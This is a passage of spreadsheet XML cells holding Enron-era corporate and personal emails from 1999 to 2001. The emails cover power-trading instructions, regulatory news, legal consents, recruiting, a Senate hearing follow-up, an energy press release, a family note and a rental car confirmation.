"Enron thinks that the elimination of physical risk during the month of _x000D_
August will be of commercial benefit because Enron expects that during the _x000D_
month of August there will be transmission line derations affecting the hour _x000D_
ahead market which will lead to TO debit charges by the CAISO.   The _x000D_
elimination of  TO debit charges is a commercial benefit to Enron. "_x000D_
_x000D_
I will call them and discuss this with them when I get back on next Tuesday._x000D_
_x000D_
2.  Do not do any financial BF trades in September.  Let's sort it back _x000D_
through with them.  The letter is surprising and we need to figure out why _x000D_
they sent it.  One month of financial at 50% is ok, but lets not do any more _x000D_
till we talk to them. ----cgy</t>
  </si>
  <si>
    <t>Fri, 26 Oct 2001 06:16:06 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'gerald.nemec@enron.com', 'carol.st.@enron.com', 'julia.murray@enron.com', 'mary.cook@enron.com', 'marcus.nettelton@enron.com'})</t>
  </si>
  <si>
    <t>Updated: Trading Contracts</t>
  </si>
  <si>
    <t>Please note the meeting will be held in ECN3824</t>
  </si>
  <si>
    <t>Fri, 12 Oct 2001 14:44:02 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: FERC ALJ Initial Decision on El Paso affiliate abuse</t>
  </si>
  <si>
    <t xml:space="preserve">Thank you._x000D_
_x000D_
-----Original Message-----_x000D_
From: Cantrell, Rebecca W. _x000D_
Sent: Wednesday, October 10, 2001 5:32 PM_x000D_
To: Dasovich, Jeff; Mara, Susan; Alvarez, Ray_x000D_
Subject: FW: FERC ALJ Initial Decision on El Paso affiliate abuse_x000D_
_x000D_
_x000D_
You've probably already received a copy by now, but here it is just in case._x000D_
_x000D_
-----Original Message----- _x000D_
From: Fulton, Donna _x000D_
Sent: Tue 10/9/2001 4:16 PM _x000D_
To: Kean, Steven J.; Shapiro, Richard; Steffes, James D.; Robertson, Linda; Novosel, Sarah; Nicolay, Christi L. _x000D_
Cc: Lawner, Leslie; Cantrell, Rebecca W.; Calcagno, Suzanne _x000D_
Subject: FERC ALJ Initial Decision on El Paso affiliate abuse_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
The ALJ issued his initial decision on the CPUC complaint case today.  As was widely expected, he found that El Paso and its merchant affiliate, El Paso Merchant, were guilty of affiliate abuse.  However, he did not find clear evidence that they were exercising market power._x000D_
_x000D_
The ID is attached. _x000D_
_x000D_
&lt;&lt;cpuc order.htm&gt;&gt; </t>
  </si>
  <si>
    <t>Mon, 30 Apr 2001 03:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bettye.langham@excite.com', 'muleman1@earthlink.net'})</t>
  </si>
  <si>
    <t>Mother's Day</t>
  </si>
  <si>
    <t>Lavonne and I  visited with Mom Sunday afternoon.  We cooked outside and had _x000D_
a great time.  Mom said that she might want to fix noodle soup on Mothers _x000D_
Day.  That would be great.  We can supplement with sausage or hamburgers on _x000D_
the grill.  What do you think.  Mom's memory appears to be good about many _x000D_
things, and then some things just don't seem to register.  She seemed _x000D_
confused about whether Bettye had been their for Easter.  Is this normal, _x000D_
what type of medication is the doctor having her take to combat the loss of _x000D_
memory?  Maybe we can all get together Mothers Day and visit.  Email me back _x000D_
please.</t>
  </si>
  <si>
    <t>Mon, 4 Dec 2000 01:34:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'shelly.jones@enron.com'})</t>
  </si>
  <si>
    <t>Analyst Recruiting</t>
  </si>
  <si>
    <t>Shelly,_x000D_
_x000D_
I am looking for an Analyst to fill a position in Gas Risk Management.  I am _x000D_
the West Desk Controller and report to Jeff Gossett.  I think a Book _x000D_
Administrator role is a good position for an Analyst.  We have had success in _x000D_
with Analysts in our group.  I think it presents a good opportunity for them _x000D_
as well.  Please let me know how I can get on a list to talk with potential _x000D_
candidates.  I am ignorant of the process, so if I am presuming something _x000D_
incorrect, I would appreciate info on how this is supposed to work.  Thanks _x000D_
for your help._x000D_
_x000D_
DG    3-9573</t>
  </si>
  <si>
    <t>Tue, 23 Nov 1999 09:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>SRRS - Close your status</t>
  </si>
  <si>
    <t xml:space="preserve">Please explain or handle.  thanks.  SS_x000D_
---------------------- Forwarded by Sara Shackleton/HOU/ECT on 11/23/99 05:47 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Information Risk Management_x000D_
11/23/99 05:26 PM_x000D_
To: Sara Shackleton/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: SRRS - Close your status_x000D_
_x000D_
This is a reminder that the incomplete SRRS requests you created and saved, _x000D_
tagged as 'New' under the SRRS process,  will be deleted on Friday 11/30/99._x000D_
 Please 'Submit' your  existing incomplete requests by 11/30/99 if you feel _x000D_
your requests need to be formally submitted and completed._x000D_
 Incomplete or 'New' SRRS requests that are older than one (1) week (starting _x000D_
12/1/99) will be deleted as part of our policy and procedures. _x000D_
_x000D_
Thank you for your cooperation, _x000D_
Information Risk Management _x000D_
_x000D_
For more information on your particular incomplete request click on link _x000D_
below._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 1 Feb 2001 03:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">will do._x000D_
_x000D_
_x000D_
_x000D_
	Steven J Kean_x000D_
	01/31/2001 05:50 PM_x000D_
		 _x000D_
		 To: Linda Robertson/NA/Enron@ENRON, Jeff Dasovich/NA/Enron@Enron, James D _x000D_
Steffes/NA/Enron@Enron, Richard Shapiro/NA/Enron@Enron, David _x000D_
Parquet/SF/ECT@ECT, Alan Comnes/PDX/ECT@ECT, Susan J Mara/NA/Enron@ENRON_x000D_
		 cc: _x000D_
		 Subject: _x000D_
_x000D_
Thanks to everyone for their work on the Senate hearing.  There are a couple _x000D_
of follow-up items:_x000D_
_x000D_
Thanks to the Portland and Washington teams, Sen Wyden is very interested in _x000D_
identifying the kind of information we need from the ISO (and PX to the _x000D_
extent it's still relevant) to make the market work better.  We have written _x000D_
this up before, I think we just need to put it in letter form.  Alan -- _x000D_
please take the lead on this and get a draft to Linda.  I think we should _x000D_
identify the information and also prepare a letter for the Chairman (?) that _x000D_
could be sent to the FERC._x000D_
Murkowski (the Committee Chairman) asked for an itemized list of things the _x000D_
fed should do to expedite siting as well as anything else we feel is _x000D_
necessary  to address the California crisis.  We have identified the need for _x000D_
open access across the nation, but he is looking for what can be done in the _x000D_
2-4 month time frame.  Dave, I think your memo to me is a good start.  Sue -- _x000D_
could you please put those and any other suggestions in letter form and get _x000D_
them to Linda?_x000D_
Finally, Sen Feinstein asked all of the witnesses to ask their CEOs not to _x000D_
"price gouge" -- yes, that's what she said.  She appealed to everyone's _x000D_
community spirit and asked suppliers to forbear charging high prices while _x000D_
California struggles to fix its problems.  I think we should send a response _x000D_
from Ken.  Jeff -- please take a cut and get to Linda.  I think the basic _x000D_
messages should be:  we are actively working on solutions with California _x000D_
policymakers (forward contracting was our idea after all); we are actively _x000D_
pursuing demand reduction in the state, etc.  We should also explain the _x000D_
nature of our business and pick up on some of the other solutions we _x000D_
identified in the written testimony, offer to meet to discuss further, etc._x000D_
</t>
  </si>
  <si>
    <t>Wed, 4 Apr 2001 05:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'suzannepepe@paulhastings.com'})</t>
  </si>
  <si>
    <t>frozenset({'kay.mann@enron.com', 'ccampbell@kslaw.com', 'rhett.jackson@enron.com', 'adrian.boutel@freshfields.com', 'isabel.parker@freshfields.com'})</t>
  </si>
  <si>
    <t>Salmon Energy LLC Agreement</t>
  </si>
  <si>
    <t>"paulhastings.com" made the following annotations on 04/04/01 12:27:50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Attached is a  revised version of the LLC Agreement.? _x000D_
?_x000D_
Please let me know  as soon as you can if these changes are acceptable so _x000D_
that we can attached this  version to the Letter Agreement.?_x000D_
?_x000D_
Thanks._x000D_
?_x000D_
Suzanne_x000D_
?_x000D_
_x000D_
______________x000D_
Suzanne Pepe_x000D_
Paul, Hastings, Janofsky &amp; Walker LLP_x000D_
1055 Washington Blvd._x000D_
Stamford, Connecticut 06901_x000D_
Note New E-Mail suzannepepe@paulhastings.com_x000D_
Phone: (203) 961-7432_x000D_
Fax (general):? (203) 359-3031_x000D_
Fax (dedicated): (203)  674-7632_x000D_
 - Salmon Energy LLC Agreement.DOC</t>
  </si>
  <si>
    <t>Thu, 14 Sep 2000 04:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'reservations@goalamo.com'})</t>
  </si>
  <si>
    <t>Alamo Reservation Confirmation 7255430 For Denver Intl Airport, CO_x000D_
 (DEN)</t>
  </si>
  <si>
    <t>Phillip,_x000D_
_x000D_
Thank you for using the Alamo Rent A Car website to make your car rental _x000D_
reservation._x000D_
_x000D_
Your Confirmation Number is: 7255430_x000D_
_x000D_
You will need this number to pick up your car, make any changes to, or cancel _x000D_
your reservation.  Please print this e-mail message or record the _x000D_
confirmation number to pick up your rental._x000D_
_x000D_
******************************************************************************_x000D_
**_x000D_
TO CANCEL OR MODIFY YOUR RESERVATION_x000D_
******************************************************************************_x000D_
**_x000D_
To view your reservation, follow this link:_x000D_
http://www.alamo.com/Default.asp?ConfirmationID=7255430&amp;LastName=Love&amp;PUMonthY_x000D_
ear=OCT-2000&amp;PUDay=12&amp;Page=Res&amp;ResPage=V_x000D_
_x000D_
To modify your reservation, follow this link:_x000D_
http://www.alamo.com/Default.asp?ConfirmationID=7255430&amp;LastName=Love&amp;PUMonthY_x000D_
ear=OCT-2000&amp;PUDay=12&amp;Page=Res&amp;ResPage=M_x000D_
_x000D_
To cancel your reservation, follow this link:_x000D_
http://www.alamo.com/Default.asp?ConfirmationID=7255430&amp;LastName=Love&amp;PUMonthY_x000D_
ear=OCT-2000&amp;PUDay=12&amp;Page=Res&amp;ResPage=C_x000D_
_x000D_
You may use the Web site to modify your reservation by following the link _x000D_
provided above.  Please note that availability or pricing may have changed.  _x000D_
Please carefully check the new reservation before cancelling your original _x000D_
reservation.  If you experience any problems, email the webmaster at _x000D_
webmaster@goalamo.com or call 1-877-252-6600._x000D_
_x000D_
******************************************************************************_x000D_
**_x000D_
RESERVATION INFORMATION_x000D_
******************************************************************************_x000D_
**_x000D_
Your reservation is for:_x000D_
_x000D_
Name: Phillip Love_x000D_
_x000D_
Vehicle type: Sport Utility - Chevrolet Blazer or Similar_x000D_
_x000D_
Pickup location:_x000D_
Denver Intl Airport, CO (DEN)_x000D_
24530 E 78th Ave_x000D_
Denver, CO  80249_x000D_
Phone: 303-342-7373_x000D_
Fax: 303-342-3431_x000D_
Hours: Mon-Sun: 6:00am-1:00am_x000D_
_x000D_
Pickup date: Thursday, October 12, 2000_x000D_
Pickup time: 5:30 PM_x000D_
_x000D_
Dropoff location: Same as Pickup Location_x000D_
Dropoff date: Sunday, October 15, 2000_x000D_
Dropoff time: 7:00 AM_x000D_
_x000D_
******************************************************************************_x000D_
**_x000D_
- Guaranteed Base Rate_x000D_
- Unlimited Mileage_x000D_
******************************************************************************_x000D_
**_x000D_
_x000D_
Base Rate Total (in USD)................................. $164.97_x000D_
Base Rate Total includes:_x000D_
(3) Daily Rate_x000D_
_x000D_
******************************************************************************_x000D_
**_x000D_
_x000D_
_x000D_
ADDITIONAL FEES AND TAXES_x000D_
******************************************************************************_x000D_
**_x000D_
Concession Recoupment Fee (10.00%)........................ $16.50_x000D_
Facility Usage Fee ($1.60/Day)............................. $4.80_x000D_
Sales Tax (13.05%)........................................ $24.31_x000D_
_x000D_
Estimated Sub-Total...................................... $210.57_x000D_
_x000D_
Total may vary slightly at the time of rental based upon pickup/dropoff _x000D_
times, Alamo contracted rates and/or election of optional coverage items._x000D_
_x000D_
Optional coverage items available at time of rental:_x000D_
 Collision Damage Waiver ($16.99/Day)_x000D_
 Extended Protection ($10.95/Day)_x000D_
 Personal Protection ($7.99/Day)_x000D_
_x000D_
Important Information:_x000D_
Drive Happy in Denver from our location at DENVER INTERNATIONAL AIRPOR _x000D_
(Mountain Time Zone / Denver County)._x000D_
Alamo's airport rental counters,  located near Baggage Claim, operate daily _x000D_
from 7:30 a.m. to 11:30 p.m.  If the counter is closed, exit the Baggage _x000D_
Claim area to the fourth island for convenient shuttle service to our rental _x000D_
facility, a 10-minute drive_x000D_
from the airport. Shuttles begin operating at 5:00 a.m._x000D_
_x000D_
Local renters go directly to our rental facility which is located at 24530 _x000D_
East 78 Avenue, a quick 10-minute drive from the airport. All cars are picked _x000D_
up and dropped off at the rental facility._x000D_
_x000D_
The airport is located 30 miles from downtown. The train station is about 20 _x000D_
minutes from the airport._x000D_
_x000D_
For expedited Quicksilver service, look for the Quicksilver signs at our _x000D_
rental facility._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
PERSONAL INFORMATION_x000D_
******************************************************************************_x000D_
**_x000D_
Name: Phillip Love_x000D_
E-Mail: plove@enron.com_x000D_
Address: 4435 Sterling Wood Way_x000D_
         Houston, TX 77059_x000D_
Country: US_x000D_
Telephone: 281-486-7026_x000D_
_x000D_
******************************************************************************_x000D_
**_x000D_
For additional information regarding your Alamo Rental, Rental Locations or _x000D_
Destination Information to plan your trip, please visit our web site via the _x000D_
links below:_x000D_
_x000D_
For additional information on your rental, click http://www.alamo.com._x000D_
For Alamo location information, click http://www.alamo.com/locations._x000D_
For destination information, click http://www.alamo.com/travel._x000D_
_x000D_
******************************************************************************_x000D_
**_x000D_
_x000D_
Thank you again for reserving your car with Alamo.  Drive Happy!</t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 06:33:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Merchant Energy Group of the Americas</t>
  </si>
  <si>
    <t xml:space="preserve">Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 06/07/2001 01:33 PM -----_x000D_
_x000D_
	Susan Bailey_x000D_
	06/05/2001 05:40 PM_x000D_
		 _x000D_
		 To: Sara Shackleton/HOU/ECT@ECT, Mary Cook/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Re: Merchant Energy Group of the Americas_x000D_
_x000D_
Sara or Mary,_x000D_
_x000D_
Carol asked that I have one of you handle the following request for the _x000D_
captioned counterparty with respect to the financial consents._x000D_
_x000D_
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
_x000D_
Carol is handling the consent for EPMI, and set forth below are her _x000D_
instructions to Rhonda Denton with EPMI_x000D_
_x000D_
Rhonda:_x000D_
Enclosed is a clean and marked version of the MEGA Assignment.  Is the plan _x000D_
to confirm these trades under the existing Master with Morgan until a new EEI _x000D_
Master is executed?  What is the cutoff date for this assignment?_x000D_
_x000D_
_x000D_
_x000D_
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++_x000D_
++++++++++++++++++++++++++++++++++++_x000D_
_x000D_
Set forth below is original message I received from the Counterparty _x000D_
requesting such consents.   I originally thought Carol would handle, but she _x000D_
said one of you should handle the financial piece for ENA.   So attached _x000D_
hereto is that orignal message and the proposed consents:_x000D_
_x000D_
_x000D_
	Susan Bailey_x000D_
	05/14/2001 03:12 PM_x000D_
		 _x000D_
		 To: Carol St Clair/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: From MEGA, Consent to Assignment...._x000D_
_x000D_
Carol,_x000D_
_x000D_
Please review message below from Kristina Drew @ Merchant Energy.  I thought _x000D_
you would be the appropriate lawyer to work on this as it involves EPMI as _x000D_
well as a derivative piece with ENA._x000D_
_x000D_
FYI:  the assignment is not of immediate need, being that FERC approval must _x000D_
secured._x000D_
_x000D_
If you do not think this to be the case, please advise as to who should work _x000D_
on this matter._x000D_
_x000D_
_x000D_
Cordially,_x000D_
Susan S. Bailey_x000D_
Enron North America Corp._x000D_
1400 Smith Street, Suite 3806A_x000D_
Houston, Texas 77002_x000D_
Phone: (713) 853-4737_x000D_
Fax: (713) 646-3490_x000D_
E:mail:  Susan.Bailey@enron.com_x000D_
----- Forwarded by Susan Bailey/HOU/ECT on 05/14/2001 03:06 PM -----_x000D_
_x000D_
	"Drew, Kristina" &lt;DrewK@merchantenergy.com&gt;_x000D_
	05/14/2001 03:05 PM_x000D_
		 _x000D_
		 To: "'susan.bailey@enron.com'" &lt;susan.bailey@enron.com&gt;_x000D_
		 cc: "Abba Gana, Mustapha" &lt;AbbaGanaM@merchantenergy.com&gt;_x000D_
		 Subject: From MEGA, Consent to Assignment...._x000D_
_x000D_
_x000D_
Susan,_x000D_
_x000D_
Please find attached for your review, a Consent to Assignment Agreement_x000D_
between us, Enron North America Corporation and Morgan Stanley Capital Group_x000D_
Inc.  We would like to have the document ready to execute at about the same_x000D_
time we execute the Physical Power Consent to Assignment Agreement with_x000D_
Enron Power Marketing, Inc., and we are waiting for FERC approval on the_x000D_
Physical Power Sales as well.  I just wanted to present the agreement to you_x000D_
now, so that if it is necessary, we have time to discuss any concerns.  I_x000D_
look forward to talking with you to work toward the execution of the_x000D_
Agreement._x000D_
_x000D_
 &lt;&lt;ENA (Basis Swap) Assignment Consent Agreement 042501.doc&gt;&gt;_x000D_
&lt;&lt;ENA (Nat Gas) Assignment Consent Agreement 042501.doc&gt;&gt;_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kristina M. Drew_x000D_
Contract Adminstrator_x000D_
Merchant Energy Group of the Americas, Inc._x000D_
410.295.1708_x000D_
_x000D_
_x000D_
 - ENA (Basis Swap) Assignment Consent Agreement 042501.doc_x000D_
 - ENA (Nat Gas) Assignment Consent Agreement 042501.doc_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 06:59:41 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'joe.caskey@enron.com', 'danny.hostetler@enron.com', 'scott.clark@enron.com', 'mike.bonnstetter@enron.com', 'ricky.brown@enron.com', 'jeff.hamlin@enron.com', 'richard.morris@enron.com', 'andrew.brown@enron.com', 'john.ford@enron.com', 'james.roberts@enron.com', 'tom.poston@enron.com', 'david.clements@enron.com', 'team.pampa@enron.com', 'lynn.eaves@enron.com', 'team.sunray-field@enron.com', 'team.sunray-compressor@enron.com', 'rick.loveless@enron.com', 'bud.mcdaniels@enron.com', 'frank.elliot@enron.com', 'team.ellis2@enron.com', 'stephen.rich@enron.com', 'gary.spraggins@enron.com', 'team.canadian-north@enron.com', 'randy.huff@enron.com', 'dick.heitman@enron.com', 'marlane.nollner@enron.com', 'rich.jolly@enron.com', 'dawson.bowers@enron.com', 'dale.roberts@enron.com', 'mark.goss@enron.com', 'dan.pribble@enron.com', 'bryce.kerby@enron.com', 'joey.woolley@enron.com', 'kevin.cantrell@enron.com', 'fred.jordan@enron.com', 'randy.howard@enron.com', 'mickey.lowe@enron.com', 'bill.marshall@enron.com', 'paul.jones@enron.com', 'david.golden@enron.com', 'jane.brickman@enron.com', 'jimmie.smith@enron.com', 'mike.pope@enron.com', 'penny.mccarran@enron.com', 'jim.lynch@enron.com', 'william.mullen@enron.com', 'eddie.pool@enron.com', 'gragg.pape@enron.com', 'ronald.scott@enron.com', 'randy.lebeau@enron.com', 'team.pampa-overhaul@enron.com', 'melinda.gallishaw@enron.com', 'kim.ladish@enron.com', 'randy.richie@enron.com', 'stephen.herber@enron.com', 'pipeline.team@enron.com', 'cliff.brasier@enron.com', 'melvin.jackson@enron.com', 'sammy.williams@enron.com', 'ronnie.brickman@enron.com', 'dave.odneal@enron.com', 'dan.mcmillian@enron.com', 'lonnie.trout@enron.com', 'team.elk-city@enron.com', 'brent.perkins@enron.com', 'richard.johnson@enron.com', 'mike.miller@enron.com', 'mark.sides@enron.com', 'john.wichert@enron.com', 'morris.brassfield@enron.com', 'ld.stephens@enron.com', 'jim.coen@enron.com', 'team.beaver-plant@enron.com', 'dennis.hall@enron.com', 'walt.williams@enron.com', 'warren.fusilier@enron.com', 'susan.poole@enron.com', 'tim.whorton@enron.com', 'john.stark@enron.com', 'bill.foresman@enron.com', 'roger.barbee@enron.com', 'g..stage@enron.com', 'alvin.adamson@enron.com', 'larry.urban@enron.com', 'team.perryton@enron.com', 'john.gross@enron.com', 'david.boothe@enron.com', 'steve.reed@enron.com', 'kenneth.young@enron.com', 'ralph.dooling@enron.com', 'larry.lane@enron.com', 'vance.griffith@enron.com', 'randy.rice@enron.com', 'steve.january@enron.com', 'team.spearman@enron.com', 'robert.sanford@enron.com', 'lynn.blair@enron.com', 'frankie.fletcher@enron.com', 'kelly.lewis@enron.com', 'vera.jones@enron.com', 'james.sanders@enron.com', 'jerry.harkreader@enron.com', 'doug.hammer@enron.com'})</t>
  </si>
  <si>
    <t>Amarillo Region Weekly Report 11/21/01</t>
  </si>
  <si>
    <t xml:space="preserve">Have a safe and Happy Thanksgiving!_x000D_
 </t>
  </si>
  <si>
    <t>Thu, 8 Mar 2001 09:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Energy Positions Taken</t>
  </si>
  <si>
    <t>Dear SVMG Members:_x000D_
_x000D_
As you may know, the Silicon Valley Manufacturing Group Board of Directors_x000D_
met this morning and voted to support two Energy proposals: The Los Esteros_x000D_
Transmission Facility and the Metcalf Energy Center._x000D_
_x000D_
Please find below the news release on SVMG's position, and an attachment_x000D_
that reviews SVMG's criteria and evaluation for both projects._x000D_
_x000D_
Thank you for your time._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Carl Guardino_x000D_
_x000D_
Local proposals part of a comprehensive platform to meet energy needs of_x000D_
Silicon Valley working families and economy_x000D_
_x000D_
For Immediate Release:         Contact: Michelle Montague-Bruno_x000D_
March 8, 2001             (408) 501-7853_x000D_
_x000D_
This morning the Silicon Valley Manufacturing Group Board of Directors voted_x000D_
in support of the proposed Metcalf Energy Center and the Los Esteros_x000D_
Transmission Project to help meet Silicon Valley's need for reliable energy._x000D_
Completing a thoughtful and deliberative process the SVMG board of directors_x000D_
voted to support the generating facility, which would offer 580 megawatts of_x000D_
new power supply to Silicon Valley and provide enough power to service_x000D_
approximately 580,000 households.  Additionally, the Los Esteros_x000D_
Transmission Project, proposed for north San Jose, provides another 800_x000D_
megawatts of new transmission capacity that will help bring power into the_x000D_
region - an issue that caused blackouts here on June 14, 2000._x000D_
"The Silicon Valley Manufacturing Group has always been a very analytical_x000D_
organization," said Dr. James Woody, president &amp; CEO of Roche_x000D_
Pharmaceuticals and chairman of the board of SVMG.  "With the energy_x000D_
infrastructure projects we developed an analytical process, and a systematic_x000D_
review of the Metcalf and Los Esteros proposals, recommending approval after_x000D_
thoughtful consideration."_x000D_
This deliberative process included the development of criteria (see_x000D_
attachment) utilized by five separate working bodies in the organization_x000D_
(three SVMG committees, its Working Council and the Board of Directors) to_x000D_
evaluate the projects and determine a position.  The organization does not_x000D_
support these two facilities as an exclusive means to fulfilling the energy_x000D_
needs of Silicon Valley families and employers, and believes our energy_x000D_
challenge requires the individual efforts of every Californian._x000D_
"The Silicon Valley Manufacturing Group board completed a very thoughtful_x000D_
and deliberative process that supports the generation and transmission of_x000D_
power in our back yard," said Carl Guardino, president &amp; CEO of the Silicon_x000D_
Valley Manufacturing Group.  "The criteria are a prism through which the_x000D_
organization assesses energy infrastructure proposals.  It was agreed that_x000D_
the Metcalf and Los Esteros projects would provide much needed energy to_x000D_
support working families, and the economy of Silicon Valley."_x000D_
Attached are the criteria utilized by the SVMG Energy Committee, SVMG Land_x000D_
Use Committee, SVMG Environment Committee, SVMG Working Council and the SVMG_x000D_
Board of Directors to review the energy projects._x000D_
Solving California's energy challenges is going to require steps beyond the_x000D_
development of the Metcalf and Los Esteros facilities, and must include_x000D_
additional generation and transmission projects throughout the region and_x000D_
state.  However, an immediate solution to help get us through the summer and_x000D_
beyond is for more energy conservation at the office and at home.  The_x000D_
E-Energy Conservation Campaign ('E' stands for email), launched on February_x000D_
7, between SVMG and Governor Davis' cabinet secretary for technology, trade_x000D_
and commerce, Lon Hatamiya, is reaching out to more than four million public_x000D_
and private employees to provide tips on ways to conserve power and save_x000D_
money at home and at the office.  For more information on the E-Energy_x000D_
Conservation Campaign, visit the SVMG Web site at www.svmg.org, and click on_x000D_
the icon for the campaign._x000D_
_x000D_
Expressing the need for a diverse portfolio of solutions in addressing the_x000D_
energy crisis, Carl Guardino will discuss everything from conservation to_x000D_
generation at the upcoming Energy Summit on March 16, and co-sponsored by_x000D_
San Jose Mayor Ron Gonzales, the Santa Clara County Board of Supervisors and_x000D_
the Silicon Valley Manufacturing Group._x000D_
"I am proud and honored to stand with Mayor Gonzales and Supervisor Jim_x000D_
Beall to co-chair an event that will look for regional solutions to help_x000D_
solve the issue," said Guardino. "We support the mayor's plan for_x000D_
alleviating our energy problems, and believe that a comprehensive approach_x000D_
must be implemented to survive this crisis.  No matter how one feels about_x000D_
specific energy projects, there is no single solution, and we need a menu of_x000D_
options, including conservation, co-generation, onsite generation,_x000D_
transmission and major generating facilities."_x000D_
Attachment:  SVMG criteria to review generation and transmission proposals,_x000D_
and how the Metcalf Energy Center and the Los Esteros Transmission project_x000D_
weigh up to those criteria._x000D_
_x000D_
 - criteria MEC &amp; Los esteros.doc</t>
  </si>
  <si>
    <t>Thu, 19 Apr 2001 12:15:43 -0700 (PDT)</t>
  </si>
  <si>
    <t>Brandywine</t>
  </si>
  <si>
    <t>There was flow at HPL meter 1505 on April first that didn't have a deal ticket out there ...._x000D_
_x000D_
but now there IS a deal ticket out there to cover it .... 740374_x000D_
_x000D_
Please link it or whatever you have to do to make it work_x000D_
_x000D_
THANKS_x000D_
_x000D_
Lee</t>
  </si>
  <si>
    <t>Fri, 6 Oct 2000 01:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ozzie.pagan@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Oz, David is interested in the fuel cell business, do you need his skill set?_x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 10/06/2000 _x000D_
08:13 AM ---------------------------_x000D_
_x000D_
_x000D_
David Ronkainen@ENRON_DEVELOPMENT_x000D_
10/05/2000 10:18 AM_x000D_
To: David W Delainey@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
Dear David,_x000D_
_x000D_
My name is David Ronkainen and I have been an Enron employee for about one _x000D_
year.  I joined _x000D_
Enron as a result of my interest in fuel cells as a business opportunity for _x000D_
me.  I met with Dave Ramm _x000D_
to discuss that opportunity and he asked me if I would be interested in _x000D_
working for Enron.  _x000D_
I recently read a press release that ENA had entered into an alliance with _x000D_
Fuel Cell Energy, Inc.  I still _x000D_
have a strong interest in fuel cells and the belief that they will be the _x000D_
most commonly used power _x000D_
supply of the not so distant future.  I went to a seminar on distributed _x000D_
power in Washington D.C. last _x000D_
week to talk with the technologists and hear what the investment community  _x000D_
thought about fuel cells _x000D_
and microturbines.  I learned a lot._x000D_
_x000D_
Right now I am working for Enron Corp. Environmental, Health and Safety.  My _x000D_
job is interesting, but I have _x000D_
a stronger interest in fuel cells and the power technology that will serve _x000D_
DP.  Do you have a job opportunity_x000D_
for a technologist in your business that is involved with fuel cells and _x000D_
microturbines?  If there is an opportunity_x000D_
I would like to talk with you about it._x000D_
_x000D_
I graduated from Michigan Technological University with a B.S. in Mechanical _x000D_
Engineering.  I have worked _x000D_
in manufacturing and the oil field service business.  I have worked at the _x000D_
corporate level in both businesses._x000D_
I know what it takes to efficiently manufacture a product and how a business _x000D_
should be run.  I also understand the _x000D_
opportunities and liabilities that environmental protection poses to new _x000D_
industries and technologies.  I  know_x000D_
that I can help Enron in this area._x000D_
_x000D_
If you would like my resume please let me know._x000D_
_x000D_
Thank you for your consideration._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
David Ronkainen_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 11 Jan 2000 20:42:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Thanks Vince.  It was good to learn of your promotion as well._x000D_
_x000D_
Cheers.</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 11:17:42 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'richard.shapiro@enron.com', 'lara.leibman@enron.com'})</t>
  </si>
  <si>
    <t>RE: drinks</t>
  </si>
  <si>
    <t xml:space="preserve">Let's do it at 5pm tonight at Teala's._x000D_
 _x000D_
Jim_x000D_
_x000D_
-----Original Message-----_x000D_
From: Leibman, Lara _x000D_
Sent: Tuesday, November 20, 2001 12:04 PM_x000D_
To: Steffes, James D._x000D_
Subject: drinks_x000D_
_x000D_
_x000D_
Jim,_x000D_
 _x000D_
Please let me know what time works for you (if we're still on for this evening).  Although Janel is out today, she told me to let her know where and when and she'll meet us later.  Also, Rick might be able to join us.  Thanks._x000D_
 _x000D_
Lara_x000D_
 _x000D_
 _x000D_
Lara Leibman_x000D_
Director, Government Affairs_x000D_
Enron Corp_x000D_
713.853.9193 (direct)_x000D_
713.851.7770 (cellular)_x000D_
Lara.Leibman@enron.com &lt;mailto:Lara.Leibman@enron.com&gt;_x000D_
 </t>
  </si>
  <si>
    <t>Mon, 23 Jul 2001 12:53:56 -0700 (PDT)</t>
  </si>
  <si>
    <t>Your summer clerk</t>
  </si>
  <si>
    <t>Gerald,_x000D_
_x000D_
I am so sorry that I have not gotten back with you regarding the message you_x000D_
